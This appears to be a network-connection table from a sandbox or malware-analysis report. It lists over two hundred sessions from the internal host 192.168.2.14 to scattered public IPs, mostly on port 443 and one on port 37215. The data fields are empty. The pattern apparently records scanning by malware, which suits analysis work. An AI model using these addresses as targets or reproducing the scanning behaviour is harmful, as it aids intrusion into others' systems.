                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15977192.168.2.1440826139.213.132.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15978192.168.2.144990254.68.55.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15979192.168.2.145802881.100.77.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15980192.168.2.143709086.89.187.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15981192.168.2.1438082166.26.201.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15982192.168.2.144421080.217.149.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15983192.168.2.1443628178.149.158.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15984192.168.2.1435790136.61.58.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15985192.168.2.1448754144.209.192.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15986192.168.2.143848099.134.74.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15987192.168.2.145696836.72.174.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15988192.168.2.143741213.2.240.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15989192.168.2.1456644167.178.136.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15990192.168.2.145034443.153.8.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15991192.168.2.1443890167.147.47.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15992192.168.2.1439356110.234.6.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15993192.168.2.144221472.105.150.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15994192.168.2.1459426195.25.11.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15995192.168.2.1445068187.141.206.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15996192.168.2.1432836191.74.26.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15997192.168.2.1458482124.241.85.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15998192.168.2.1438660207.32.66.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15999192.168.2.1452956144.209.139.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16000192.168.2.144217673.160.62.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16001192.168.2.143607490.54.255.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16002192.168.2.1458406132.234.16.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16003192.168.2.1450282218.185.77.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16004192.168.2.146093869.157.52.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16005192.168.2.144730680.1.95.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16006192.168.2.1457388192.225.50.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16007192.168.2.1454888110.204.101.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16008192.168.2.1443464193.192.146.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16009192.168.2.1445094111.40.65.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16010192.168.2.145676078.204.68.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16011192.168.2.145634049.149.5.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16012192.168.2.145685876.142.139.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16013192.168.2.1442988152.16.123.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16014192.168.2.1449538110.181.234.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16015192.168.2.145740040.198.159.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16016192.168.2.145469881.205.152.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16017192.168.2.1449136116.178.196.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16018192.168.2.1434202121.180.10.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16019192.168.2.1452546194.102.116.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16020192.168.2.143786870.56.69.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16021192.168.2.1451286129.95.32.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16022192.168.2.1457224160.104.226.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16023192.168.2.1437424139.48.220.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16024192.168.2.145777890.139.135.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16025192.168.2.1455080138.14.210.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16026192.168.2.145615452.130.15.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16027192.168.2.1445526202.105.26.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16028192.168.2.145228086.30.106.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16029192.168.2.1447016201.113.191.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16030192.168.2.1437980195.190.176.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16031192.168.2.145025038.125.77.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16032192.168.2.144908690.30.32.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16033192.168.2.1446556195.87.26.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16034192.168.2.1441766136.167.180.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16035192.168.2.144575083.150.191.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16036192.168.2.145895432.88.225.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16037192.168.2.144107448.106.55.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16038192.168.2.1432846119.55.42.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16039192.168.2.1458292188.12.8.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16040192.168.2.145860248.120.49.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16041192.168.2.144563262.3.126.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16042192.168.2.1438188177.177.246.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16043192.168.2.1441378207.59.63.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16044192.168.2.14593848.82.92.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16045192.168.2.143483071.127.234.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16046192.168.2.144467697.215.87.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16047192.168.2.1436526108.43.65.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16048192.168.2.1457354213.202.20.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16049192.168.2.144280887.27.36.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16050192.168.2.1451620159.89.50.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16051192.168.2.14340401.3.180.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16052192.168.2.14353489.170.53.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16053192.168.2.1435592202.201.208.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16054192.168.2.1456156218.20.210.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16055192.168.2.143877486.160.31.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16056192.168.2.1441326220.247.232.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16057192.168.2.144432219.26.115.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16058192.168.2.144521851.83.176.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16059192.168.2.1456856119.107.195.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16060192.168.2.1454262174.89.66.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16061192.168.2.1459350185.245.207.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16062192.168.2.1452762160.87.63.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16063192.168.2.1456938185.217.251.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16064192.168.2.1450044190.221.32.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16065192.168.2.1442082190.234.211.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16066192.168.2.1446068170.71.230.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16067192.168.2.1449784168.7.61.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16068192.168.2.143449443.175.103.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16069192.168.2.1448384191.140.247.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16070192.168.2.144688098.235.7.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16071192.168.2.1435216146.48.125.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16072192.168.2.146065651.176.148.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16073192.168.2.1459026187.104.43.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16074192.168.2.143545636.42.191.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16075192.168.2.144113297.103.194.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16076192.168.2.143755835.200.11.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16077192.168.2.1443922178.147.99.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16078192.168.2.1444528182.125.125.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16079192.168.2.1458566211.219.1.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16080192.168.2.1436422153.18.108.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16081192.168.2.144361037.90.243.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16082192.168.2.143322869.168.55.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16083192.168.2.144366097.148.242.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16084192.168.2.144845091.40.146.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16085192.168.2.1458556149.74.223.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16086192.168.2.1446028111.152.186.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16087192.168.2.1444034186.123.131.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16088192.168.2.1433564102.123.239.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16089192.168.2.1455574139.37.163.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16090192.168.2.1444348223.49.228.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16091192.168.2.1459038189.229.163.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16092192.168.2.1436740220.195.220.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16093192.168.2.1443982193.138.87.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16094192.168.2.145909468.67.129.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16095192.168.2.145020819.44.219.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16096192.168.2.14550429.4.156.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16097192.168.2.1456666181.208.228.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16098192.168.2.145229886.72.186.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16099192.168.2.1440676112.60.122.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16100192.168.2.1455474112.88.112.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16101192.168.2.14488168.43.171.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16102192.168.2.1453354178.205.86.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16103192.168.2.146060880.103.228.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16104192.168.2.145834841.136.182.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16105192.168.2.1457444168.239.205.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16106192.168.2.143889696.13.209.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16107192.168.2.145984812.113.71.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16108192.168.2.145588898.49.134.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16109192.168.2.1436942146.50.76.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16110192.168.2.144952013.119.136.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16111192.168.2.143280263.75.133.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16112192.168.2.1458612213.109.113.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16113192.168.2.145919217.184.230.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16114192.168.2.1455662105.217.0.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16115192.168.2.1449286149.221.16.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16116192.168.2.1456034148.0.0.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16117192.168.2.1454368137.33.42.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16118192.168.2.1449258128.1.139.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16119192.168.2.1457934213.221.198.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16120192.168.2.14602268.233.205.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16121192.168.2.1433898135.47.124.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16122192.168.2.144276288.140.175.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16123192.168.2.1452540140.44.237.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16124192.168.2.1439952128.141.200.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16125192.168.2.145154038.1.145.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16126192.168.2.1450486163.1.177.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16127192.168.2.144728214.34.117.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16128192.168.2.1434554157.142.173.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16129192.168.2.1458468125.73.239.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16130192.168.2.144216481.246.205.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16131192.168.2.1453814115.75.172.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16132192.168.2.14609461.16.49.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16133192.168.2.145908870.154.114.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16134192.168.2.1455250183.16.137.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16135192.168.2.143498846.61.233.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16136192.168.2.145806045.248.75.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16137192.168.2.145369475.118.89.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16138192.168.2.1444636105.86.97.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16139192.168.2.1437118108.248.63.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16140192.168.2.145759661.22.253.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16141192.168.2.1452602137.87.150.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16142192.168.2.1460752151.188.179.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16143192.168.2.1438484188.200.60.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16144192.168.2.145043882.169.11.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16145192.168.2.144523871.232.11.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16146192.168.2.144801077.142.221.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16147192.168.2.1448350103.225.82.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16148192.168.2.1450182211.207.46.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16149192.168.2.145839841.204.15.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16150192.168.2.1449992185.72.28.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16151192.168.2.1451978186.16.7.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16152192.168.2.1452684152.36.115.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16153192.168.2.1458076178.214.71.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16154192.168.2.1449730158.223.82.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16155192.168.2.1453928109.239.27.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16156192.168.2.145139888.252.51.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16157192.168.2.1452308169.194.214.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16158192.168.2.14366325.197.73.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16159192.168.2.1437798192.48.158.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16160192.168.2.144762883.34.177.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16161192.168.2.1450100123.50.100.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16162192.168.2.1451262213.251.211.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16163192.168.2.1456830176.243.0.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16164192.168.2.1441718120.43.87.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16165192.168.2.1443282197.246.62.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16166192.168.2.1439802128.50.79.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16167192.168.2.143396457.143.183.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16168192.168.2.143969413.35.82.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16169192.168.2.145236488.242.153.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16170192.168.2.1445890102.137.107.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16171192.168.2.1453882130.52.140.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16172192.168.2.1448320175.50.179.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16173192.168.2.1439074218.187.147.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16174192.168.2.1455686115.173.187.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16175192.168.2.1445042188.78.240.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16176192.168.2.1440996131.10.205.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16177192.168.2.1457108204.210.2.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16178192.168.2.1440044150.113.115.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16179192.168.2.1448226188.107.190.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16180192.168.2.1453610175.250.95.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16181192.168.2.1459662143.148.163.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16182192.168.2.1436012220.116.38.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16183192.168.2.1439458160.11.168.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16184192.168.2.1445120156.206.37.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16185192.168.2.1456654105.210.42.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16186192.168.2.1450520101.246.199.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16187192.168.2.144215627.241.70.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16188192.168.2.1445366210.221.26.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16189192.168.2.144818853.242.49.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16190192.168.2.1451362178.152.11.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16191192.168.2.144024251.32.85.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16192192.168.2.1456606102.91.224.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16193192.168.2.1434502116.38.77.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16194192.168.2.144646066.188.162.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16195192.168.2.143396475.177.156.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16196192.168.2.1453294122.122.211.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16197192.168.2.145210465.218.166.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16198192.168.2.1440426167.173.1.6443
